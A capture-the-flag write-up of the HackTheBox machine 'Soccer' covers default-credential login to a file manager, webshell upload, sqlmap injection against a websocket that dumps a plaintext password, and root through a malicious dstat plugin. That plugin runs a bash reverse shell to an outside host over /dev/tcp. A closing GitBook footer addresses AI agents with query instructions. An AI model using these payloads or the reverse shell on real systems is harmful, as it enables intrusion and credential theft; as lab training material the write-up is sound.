> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-soccer.md).

# HTB - Soccer

## NMAP

```bash
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FszI1aETRhb8uj78XYnJK%2Fimage.png?alt=media&amp;token=48628e33-e333-436e-bdf6-bc003860c2e5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEA14Lqo1UOxDWmsKwPS5%2Fimage.png?alt=media&amp;token=9c66b53d-49d9-4596-80e2-5020761eb8da" alt=""><figcaption></figcaption></figure>

There is a file manager at the `/tiny.`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4yMMz40K09xrIxzBfctI%2Fimage.png?alt=media&amp;token=f27488ab-3401-488c-8ef0-485914527210" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJwO9fuJ0PggRBYfxnKDr%2Fimage.png?alt=media&amp;token=abca45c8-3421-4a9d-8a6b-e8732ee98de1" alt=""><figcaption></figcaption></figure>

Version : 2.4.3

A google search on the version revealed that the version is vulnerable to path traversal and remote code execution through file uploads.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfxwqbWuLSeWuJzYbOfVM%2Fimage.png?alt=media&amp;token=3a545742-18d4-4516-a6ce-e38c4b397b75" alt=""><figcaption></figcaption></figure>

Aslo search for default credentials gave creds `admin : admin@123`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5DsT9fhe2wJLhygmho0G%2Fimage.png?alt=media&amp;token=ced1a7c4-eb03-4e23-afe2-737544bc58ea" alt=""><figcaption></figcaption></figure>

and the default creds for admin account works.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F86pvhkwLDkGBX2IhF70K%2Fimage.png?alt=media&amp;token=d65da02f-bde8-41c6-8bbf-15d0177f13c9" alt=""><figcaption></figcaption></figure>

there is an upload feature where we can try to upload a webshell and get RCE.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fr9hxblokvZQz7Zxmg99a%2Fimage.png?alt=media&amp;token=38ec9004-7567-4dee-8042-b9144e60caed" alt=""><figcaption></figcaption></figure>

Now, i dont have permission to write to the root directory but have permission to write to `/tiny/uploads`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8BzeDe8Y1In9XfeJ1qqX%2Fimage.png?alt=media&amp;token=2a44263e-45ae-4778-b74b-2b0687cd3569" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLaIriHAIdvWjKBooIctO%2Fimage.png?alt=media&amp;token=b19d88c3-2343-4d95-9e9b-731e3139044b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrNem8yXlcnWLG4wtRIId%2Fimage.png?alt=media&amp;token=2506d362-ee42-41d8-8f40-e2c59c8bba74" alt=""><figcaption></figcaption></figure>

click open

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLIYUcQBmcg4BwOva0mbK%2Fimage.png?alt=media&amp;token=0f382b60-bfb9-4e22-ad0c-ce1a6311aed8" alt=""><figcaption></figcaption></figure>

RCE…!!! But the file is getting deleted in some time so we need to be quick in getting the shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRGKG2Ikf1o8gNNn4EvGl%2Fimage.png?alt=media&amp;token=59217aee-701e-490e-b34e-659b8632840f" alt=""><figcaption></figcaption></figure>

## Shell as WWW-DATA

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpaxrcHmTtq4qxsFvIE5s%2Fimage.png?alt=media&amp;token=594859e4-7686-4b89-a9ba-b67cf4960895" alt=""><figcaption></figcaption></figure>

```bash
www-data@soccer:/home$ cd player
cd player
www-data@soccer:/home/player$ ls
ls
user.txt
www-data@soccer:/home/player$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@soccer:/home/player$ 
```

we need to be player or root to read the `user.txt`

the ngnix configuration files leaks another vhost called `soc-player` on port 3000.

added the host to `/etc/hosts` file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs8qOnIM0vc3Zn6Cy1iai%2Fimage.png?alt=media&amp;token=39f08340-6fd3-4444-808a-6b45beb9a921" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoSwfBB5iJoZ8JZNgBIBq%2Fimage.png?alt=media&amp;token=2cbe7c95-42e0-4a30-8327-7659aa3b0b55" alt=""><figcaption></figcaption></figure>

the is sending request to port 9091 and is a web socket.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTotFeTIDvKzi7NzujsKa%2Fimage.png?alt=media&amp;token=a2967f54-c4e7-4f05-b52e-313458ffafd4" alt=""><figcaption></figcaption></figure>

Accessing soc-player.soccer.htb now gives login and signup option also new match option

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0unV0VmPQwtRJPRj8TFg%2Fimage.png?alt=media&amp;token=01349686-5905-4429-b43c-aeeba14dcc96" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPjOE4Wp4ExQjapx2QYy0%2Fimage.png?alt=media&amp;token=7d21ff38-2b34-4f50-ad64-a4068e83f9de" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJXoL8qZ6AEZTt6GoQzZ9%2Fimage.png?alt=media&amp;token=5e6776c0-2024-460d-ba41-d6fea70a0fc4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWwD7qtwSWYkmmuJzV6pk%2Fimage.png?alt=media&amp;token=21eb3547-3e62-48d8-b913-5fd62dc555fc" alt=""><figcaption></figcaption></figure>

Back on the shell, running netstat reveals that mysql is running on the machine. so probably the backend is mysql database.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHMlOiec3ZrP8juDSz0dZ%2Fimage.png?alt=media&amp;token=c67476f4-7072-4154-8fd5-75b07a5f9ec3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fak6z6tnAB1wuklGu6cLg%2Fimage.png?alt=media&amp;token=29a334cf-1c54-4f60-b524-0301d17a46af" alt=""><figcaption></figcaption></figure>

the check is sending data in json. i will use sqlmap if it can give me something if it is vulnerable to sql injection.

### SQLMAP

```bash
┌──(ajay㉿kali)-[~]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   <https://sqlmap.org>

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:21:41 /2026-06-11/

JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[22:21:42] [INFO] testing connection to the target URL
[22:21:45] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:21:45] [INFO] testing if the target URL content is stable
[22:21:45] [INFO] target URL content is stable
[22:21:45] [INFO] testing if (custom) POST parameter 'JSON id' is dynamic
[22:21:45] [WARNING] (custom) POST parameter 'JSON id' does not appear to be dynamic
[22:21:46] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON id' might not be injectable
[22:21:46] [INFO] testing for SQL injection on (custom) POST parameter 'JSON id'
[22:21:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:21:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:21:59] [INFO] (custom) POST parameter 'JSON id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[22:21:59] [INFO] testing 'Generic inline queries'
[22:21:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:21:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:22:00] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:22:00] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:22:00] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:22:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:22:00] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:22:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:22:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:22:01] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:22:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:22:01] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:22:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:22:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:22:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:22:02] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[22:22:02] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[22:22:02] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:22:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[22:22:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[22:22:03] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[22:22:03] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[22:22:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[22:22:03] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[22:22:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[22:22:04] [INFO] testing 'MySQL inline queries'
[22:22:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:22:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:22:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:22:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:22:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:22:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:22:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:22:16] [INFO] (custom) POST parameter 'JSON id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[22:22:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:22:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:22:20] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:22:25] [INFO] testing 'Generic UNION query (49) - 21 to 40 columns'
[22:22:29] [INFO] testing 'Generic UNION query (49) - 41 to 60 columns'
[22:22:33] [INFO] testing 'Generic UNION query (49) - 61 to 80 columns'
[22:22:36] [INFO] testing 'Generic UNION query (49) - 81 to 100 columns'
[22:22:40] [INFO] testing 'MySQL UNION query (49) - 1 to 20 columns'
[22:22:47] [INFO] testing 'MySQL UNION query (49) - 21 to 40 columns'
[22:22:50] [INFO] testing 'MySQL UNION query (49) - 41 to 60 columns'
[22:22:55] [INFO] testing 'MySQL UNION query (49) - 61 to 80 columns'
[22:22:58] [INFO] testing 'MySQL UNION query (49) - 81 to 100 columns'
[22:23:02] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[22:23:02] [INFO] checking if the injection point on (custom) POST parameter 'JSON id' is a false positive
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 374 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"id": "-9784 OR 8974=8974"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"id": "1234 AND (SELECT 7010 FROM (SELECT(SLEEP(5)))sYlJ)"}
---
[22:23:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[22:23:08] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/soc-player.soccer.htb'

[*] ending @ 22:23:08 /2026-06-11/

```

database : mysql

```bash
┌──(ajay㉿kali)-[~]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   <https://sqlmap.org>
      
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys

[22:26:17] [INFO] fetched data logged to text files under '/home/ajay/.local/share/sqlmap/output/soc-player.soccer.htb'

[*] ending @ 22:26:17 /2026-06-11/
```

There is a non-default database called soccer\_db

```bash
#tables in soccer_db
┌──(ajay㉿kali)-[~]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -D soccer_db --tables
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[(]_____ ___ ___  {1.10.2#stable}                                                                                                                                                                                                   
|_ -| . [.]     | .'| . |                                                                                                                                                                                                                   
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   <https://sqlmap.org>                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+

[22:27:22] [INFO
```

`soccer_db` have `accounts` table we can dump it to see what data does it have.

```bash
#dumping accounts
┌──(ajay㉿kali)-[~]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -D soccer_db -T accounts --dump
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[,]_____ ___ ___  {1.10.2#stable}                                                                                                                                                                                                   
|_ -| . [(]     | .'| . |                                                                                                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   <https://sqlmap.org>                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:28:19 /2026-06-11/
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

```

The creds of player are leaked. we can ssh on the machine, so i can try running the creds over ssh and get shell as player.

## Shell as Player

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpjPdN68xz8ftbEo7ayTu%2Fimage.png?alt=media&amp;token=3246e3ba-7762-442e-abfa-a41c6c51f8db" alt=""><figcaption></figcaption></figure>

grab the `user.txt`

```bash
player@soccer:~$ find / -perm -4000 -type f 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
```

looking at the suid bit files `/usr/local/bin/doas`  is present which acts similar to sudo. we can leverage this to get to Root.

`doas` is OpenBSD's sudo alternative.

### Exploiting Doas and DSTAT

```bash
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:~$ 
```

dstat allows loading Python plugins, which gives root code execution.

This github explains clearly on how to exploit

{% embed url="<https://github.com/GTFOBins/GTFOBins.github.io/blob/master/_gtfobins/dstat>" %}

```bash
player@soccer:~$ ls -l /usr/local/share/
total 16
drwxr-xr-x 2 root root   4096 Nov 15  2022 ca-certificates
drwxrwx--- 2 root player 4096 Jun 12 03:00 dstat
drwxrwsr-x 2 root staff  4096 Nov 17  2022 fonts
drwxr-xr-x 5 root root   4096 Nov 17  2022 man
player@soccer:~$ 

```

`/usr/local/share/dstat` is group-writable by player! That's the plugin directory dstat checks.

`dstat` allows you to run arbitrary Python scripts loaded as "external plugins" if they are located in one of the directories, stated in the `dstat` man page under "FILES":

save the file as `dstat_exploit.py`

```bash
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.15.204/4444 0>&1'")
class dstat_plugin(dstat): pass
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZYkvoPKY6s5jGoQrmwWd%2Fimage.png?alt=media&amp;token=305327ff-62f5-49e8-9f0a-c4e1b6efad2d" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-soccer.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
